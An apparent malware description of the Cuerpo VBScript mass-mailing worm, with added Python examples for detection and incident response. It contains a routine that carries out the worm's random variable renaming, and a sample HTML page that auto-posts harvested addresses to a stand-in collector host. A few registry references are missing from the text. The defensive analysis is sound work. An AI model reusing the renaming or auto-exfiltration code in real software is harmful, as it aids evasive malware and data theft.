Cuerpo is a polymorphic Visual Basic Script mass-mailer. Its
polymorphism consists of renaming every variable each time it
replicates on a system: each variable receives a new name of 2 to
10 random characters. The list of these polymorphic variable names
is kept in a comment line at the top of the worm code. Cuerpo also
saves itself and most of its components in files with random names.
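The practical consequence of this kind of polymorphism is that a file hash or a plain string signature changes with every replication, while the structure of the script does not. The following is an added example (not code from the page or from Cuerpo) that renames the variables of a constructed, benign VBScript fragment with random 2 to 10 character names, as the page describes, and then shows that a SHA-256 of the file differs while a hash over an identifier-normalised form stays the same. The sample script, the reserved-word list and the `v0, v1, ...` placeholder scheme are assumptions made for the example.

```python
import hashlib
import random
import re
import string

# Constructed, benign VBScript fragment standing in for a worm body. It is not
# Cuerpo's code; only the shape (variable list in a top comment, then the script)
# follows the page's description.
SAMPLE_VBS = """' polymorphic variables: fso sysdir target
Dim fso, sysdir, target
Set fso = CreateObject("Scripting.FileSystemObject")
sysdir = fso.GetSpecialFolder(1)
target = sysdir & "\\" & "example.vbs"
If Not fso.FileExists(target) Then
    WScript.Echo "would copy to " & target
End If
"""

# VBScript keywords plus a few built-ins that keep their spelling in the normalised
# form; any other identifier that is not a member name (after a dot) is a variable.
VBS_RESERVED = {
    "dim", "set", "if", "then", "else", "elseif", "end", "for", "next", "each", "in",
    "while", "wend", "do", "loop", "function", "sub", "call", "on", "error", "resume",
    "true", "false", "nothing", "and", "or", "not", "createobject", "wscript",
}

IDENT_RE = re.compile(r"\b[A-Za-z_][A-Za-z0-9_]*\b")
# string literal | comment to end of line | identifier | any other single character
TOKEN_RE = re.compile(r'''("(?:[^"]|"")*")|('[^\n]*)|(\b[A-Za-z_][A-Za-z0-9_]*\b)|(\S)''')


def rename_variables(script, variables, rng):
    """Give every listed variable a fresh random name of 2 to 10 characters, as the
    page describes; reserved words and collisions with other names are avoided."""
    mapping = {}
    for var in variables:
        while True:
            length = rng.randint(2, 10)
            new = rng.choice(string.ascii_letters) + "".join(
                rng.choices(string.ascii_letters + string.digits, k=length - 1))
            if (new.lower() not in VBS_RESERVED and new not in mapping.values()
                    and new not in variables):
                break
        mapping[var] = new
    return IDENT_RE.sub(lambda m: mapping.get(m.group(0), m.group(0)), script)


def normalize(script):
    """Canonical form: comments dropped, case folded, every non-reserved identifier
    that is not a member name replaced by v0, v1, ... in order of first appearance."""
    out, names, prev = [], {}, None
    for match in TOKEN_RE.finditer(script):
        literal, comment, ident, other = match.groups()
        if comment is not None:
            continue
        if literal is not None:
            tok = literal
        elif ident is not None:
            low = ident.lower()
            if low in VBS_RESERVED or prev == ".":
                tok = low
            else:
                tok = names.setdefault(low, "v%d" % len(names))
        else:
            tok = other
        out.append(tok)
        prev = tok
    return " ".join(out)


def file_hash(script):
    return hashlib.sha256(script.encode()).hexdigest()


def structural_hash(script):
    return hashlib.sha256(normalize(script).encode()).hexdigest()


def demo(seed=2024):
    """Mutate the sample once and compare both hash kinds against the original."""
    rng = random.Random(seed)
    mutated = rename_variables(SAMPLE_VBS, ["fso", "sysdir", "target"], rng)
    return {
        "same_file_hash": file_hash(mutated) == file_hash(SAMPLE_VBS),
        "same_structural_hash": structural_hash(mutated) == structural_hash(SAMPLE_VBS),
    }


if __name__ == "__main__":
    print(demo())
```

The normalised form is what a detection engine would hash or pattern-match instead of the raw file; note that member names after a dot (for example `GetSpecialFolder`) are deliberately left alone, since the worm only renames its own variables.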
Once executed, the worm first generates a new polymorphic copy of
itself and saves it to the Windows System directory under a random
name. Next it drops another file, again with a random name, into
the System directory; this file contains a payload script. The
script is added to the registry:
so that it is executed every time the system is restarted.
The script checks whether four days have passed since the
infection and, if so, sets the Internet Explorer start page to
www.freedonation.com. Otherwise Cuerpo drops into the System
directory a file "blank.html" that contains JavaScript code. This
code opens a new browser window to www.freedonation.com and
executes the worm. This HTML file is set as the Internet Explorer
start page.
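For incident response the two persistent traces described above, a randomly named .vbs started from the registry and an Internet Explorer start page pointing at a local HTML file, can be checked from an exported registry snapshot. The following is an added example (not code from the page) that parses a small constructed .reg export and flags both traits. The page does not name the registry key Cuerpo uses, so the Run key, the value names and the file names in the sample are assumptions.

```python
import re

# Constructed .reg export (not captured from a real infection). The Run key and the
# random-looking names are assumptions: the page only says the payload script is
# started from the registry, not which key is used.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SystemTray"="SysTray.Exe"
"xk3q9z"="wscript.exe C:\\WINDOWS\\SYSTEM\\hq7w2kd.vbs"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="C:\\WINDOWS\\SYSTEM\\blank.html"
"Search Page"="http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch"
"""

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|(@))=(.*)$')
# a script with a WSH extension sitting directly in the System directory
VBS_IN_SYSTEM_RE = re.compile(r"\\system(?:32)?\\[^\\\s]+\.vb[se]\b", re.I)


def parse_reg(text):
    """Parse the subset of .reg syntax needed here: key headers and string values."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        key = KEY_RE.match(line)
        if key:
            current = keys.setdefault(key.group(1), {})
            continue
        value = VALUE_RE.match(line)
        if value and current is not None:
            name = "@" if value.group(2) else value.group(1)
            data = value.group(3)
            if data.startswith('"') and data.endswith('"'):
                # undo .reg escaping of quotes and backslashes
                data = data[1:-1].replace('\\"', '"').replace("\\\\", "\\")
            current[name] = data
    return keys


def is_local_file(path):
    return bool(re.match(r"^[a-z]:\\", path, re.I)) or path.startswith("\\\\")


def find_cuerpo_indicators(reg_text):
    """Return (reason, key, value name, data) for Run entries that launch a script
    from the System directory and for a start page that is a local file or the
    site named on the page."""
    findings = []
    for key, values in parse_reg(reg_text).items():
        low = key.lower()
        if low.endswith(r"\currentversion\run") or low.endswith(r"\currentversion\runonce"):
            for name, data in values.items():
                if VBS_IN_SYSTEM_RE.search(data):
                    findings.append(("run_vbs_in_system_dir", key, name, data))
        elif low.endswith(r"\internet explorer\main"):
            start = values.get("Start Page", "")
            if is_local_file(start) or "freedonation.com" in start.lower():
                findings.append(("ie_start_page", key, "Start Page", start))
    return findings


if __name__ == "__main__":
    for hit in find_cuerpo_indicators(SAMPLE_REG):
        print(hit)
```

A local HTML start page is not malicious by itself, which is why the finding carries the path: the analyst still has to open the file (in an editor, not a browser) and look for the script that the page says reopens the worm.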
The worm spreads through the Internet in two different ways. The
first method uses the Outlook Application and its folders; this is
the first mass-mailing routine. It goes through the Inbox, Sent
Mail, Outbox and Deleted Items folders of the user's Outlook
installation looking for messages that contain an attachment. When
it finds such messages, it replies to them with the same subject,
sending itself as an attachment whose name is the name of the
original attachment with the following string appended:
" (9 Kbytes).vbs"
Then the worm creates "wininit.bat", which drops the worm onto the
system and modifies "autoexec.bat" so that the worm is set, via the
registry, to start on every system restart.
Then Cuerpo sends itself to all recipients in all address books,
using one subject/attachment-name combination taken from the
scanned folders. These messages also contain the worm code
embedded in the message body as HTML.
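Both traits of this first routine, the "<original name> (9 Kbytes).vbs" attachment name and the worm body embedded as HTML in the message, are visible to a mail gateway before the message reaches Outlook. The following is an added example (not code from the page) that runs those checks over three constructed messages with Python's standard email parser: a reply carrying a disguised .vbs, a benign reply, and an HTML body containing a VBScript tag. The addresses, subjects and attachment contents are placeholders, not real captures.

```python
import email
import re
from email import policy

# Constructed messages (not real captures). Attachment bodies are inert placeholder
# text, not worm code; addresses are example.com placeholders.
REPLY_WITH_DISGUISED_VBS = """From: alice@example.com
To: bob@example.com
Subject: Re: quarterly figures
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Please see the attachment.
--b1
Content-Type: application/octet-stream; name="figures.xls (9 Kbytes).vbs"
Content-Disposition: attachment; filename="figures.xls (9 Kbytes).vbs"

' placeholder attachment body
--b1--
"""

BENIGN_REPLY = """From: alice@example.com
To: bob@example.com
Subject: Re: quarterly figures
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b2"

--b2
Content-Type: text/plain

Attached as requested.
--b2
Content-Type: application/vnd.ms-excel; name="figures.xls"
Content-Disposition: attachment; filename="figures.xls"

placeholder spreadsheet bytes
--b2--
"""

HTML_BODY_WITH_SCRIPT = """From: alice@example.com
To: bob@example.com
Subject: quarterly figures
MIME-Version: 1.0
Content-Type: text/html

<html><body><script language="VBScript">' placeholder, no worm code</script></body></html>
"""

# "<name>.<ext> (<n> Kbytes).vbs": the naming the page attributes to Cuerpo.
CUERPO_NAME_RE = re.compile(r"\.[a-z0-9]{1,4}\s*\(\d+\s*kbytes?\)\.vbs$", re.I)
# Broader check: any earlier extension followed by a Windows Script Host extension.
DOUBLE_EXT_SCRIPT_RE = re.compile(r"\.[a-z0-9]{1,4}\b.*\.(?:vbs|vbe|js|jse|wsf|wsh)$", re.I)
VBSCRIPT_TAG_RE = re.compile(r"<script[^>]*vbscript", re.I)


def classify_message(raw):
    """Return (reason, detail) tuples for every Cuerpo-style trait found."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        filename = part.get_filename()
        if filename:
            if CUERPO_NAME_RE.search(filename):
                findings.append(("cuerpo_attachment_name", filename))
            elif DOUBLE_EXT_SCRIPT_RE.search(filename):
                findings.append(("double_extension_script", filename))
        if part.get_content_type() == "text/html":
            if VBSCRIPT_TAG_RE.search(part.get_content()):
                findings.append(("vbscript_in_html_body", "text/html"))
    return findings


if __name__ == "__main__":
    for sample in (REPLY_WITH_DISGUISED_VBS, BENIGN_REPLY, HTML_BODY_WITH_SCRIPT):
        print(classify_message(sample))
```

The exact-name rule is narrow on purpose and would not survive a change of the appended string; the double-extension rule is the one worth keeping in a gateway policy, since it covers the general trick of hiding a script behind a document-looking name.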
Cuerpo uses another method to spread as well. In addition to
sending itself to the e-mail addresses listed in the Outlook
Application's address book, it also collects all e-mail-like
strings (searching for a special character) from files that are
database files for various e-mail clients. These database files
have the extensions
"txt", "na2", "wab", "mbx" and "dbx"
In addition it searches all "dat" files located in the directory
whose name contains the string found in the registry key
Cuerpo stores all these e-mail addresses in an HTML file in the
System directory. This HTML file contains a form that is submitted
to the virus writer's web site. It is referenced from "blank.html",
so the information is sent as soon as the infected user opens
Internet Explorer. From that remote location the worm is then sent,
as HTML embedded in an otherwise empty message, to all the e-mail
addresses previously collected from the database files above. The
virus writer's web page was disabled within a few hours after the
worm was discovered, so the second mass-mailing part of the worm
no longer works.
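The harvested-address file is the one artefact of this second routine that survives on an infected host, and the same check applies to any dropped HTML page that posts data off-host without user action. The following is an added example (not code from the page) that parses a constructed stand-in for that file with Python's html.parser, extracts the form target and the e-mail addresses carried in its hidden fields, and reports whether the page submits itself on load. The collector host, path and addresses are assumptions; the page does not give the real URL of the writer's site.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed stand-in for the dropped address file. Host, path and addresses are
# assumptions made for this example, not values taken from the worm.
SAMPLE_DROPPED_HTML = """<html><body onload="document.forms[0].submit()">
<form method="post" action="http://collector.example.invalid/cgi-bin/collect.pl">
<input type="hidden" name="addr" value="alice@example.com">
<input type="hidden" name="addr" value="bob@example.org">
<input type="hidden" name="addr" value="carol@example.net">
<input type="submit" value="ok">
</form></body></html>
"""

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


class FormScanner(HTMLParser):
    """Collect every form with its hidden values and note a self-submitting body."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self.autosubmit = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "body" and "submit" in (a.get("onload") or "").lower():
            self.autosubmit = True
        elif tag == "form":
            self.forms.append({"action": a.get("action") or "",
                               "method": (a.get("method") or "get").lower(),
                               "hidden": []})
        elif tag == "input" and self.forms and (a.get("type") or "").lower() == "hidden":
            self.forms[-1]["hidden"].append(a.get("value") or "")


def analyse_dropped_html(html, local_hosts=("localhost", "127.0.0.1")):
    """One report per form: target host, whether it is off-host, the addresses the
    form carries, and whether the page submits without user action."""
    scanner = FormScanner()
    scanner.feed(html)
    scanner.close()
    reports = []
    for form in scanner.forms:
        host = (urlsplit(form["action"]).hostname or "").lower()
        external = bool(host) and host not in local_hosts
        addresses = sorted({addr for value in form["hidden"]
                            for addr in EMAIL_RE.findall(value)})
        reports.append({
            "host": host,
            "method": form["method"],
            "external": external,
            "addresses": addresses,
            "autosubmit": scanner.autosubmit,
            # the combination the page describes: collected addresses posted to a
            # remote site as soon as the browser opens the file
            "exfiltration": external and bool(addresses) and scanner.autosubmit,
        })
    return reports


if __name__ == "__main__":
    for report in analyse_dropped_html(SAMPLE_DROPPED_HTML):
        print(report)
```

The host in the report is also the value to block or sinkhole at the perimeter; in Cuerpo's case the page notes that the remote site was taken down within hours, which is why that half of the worm stopped working.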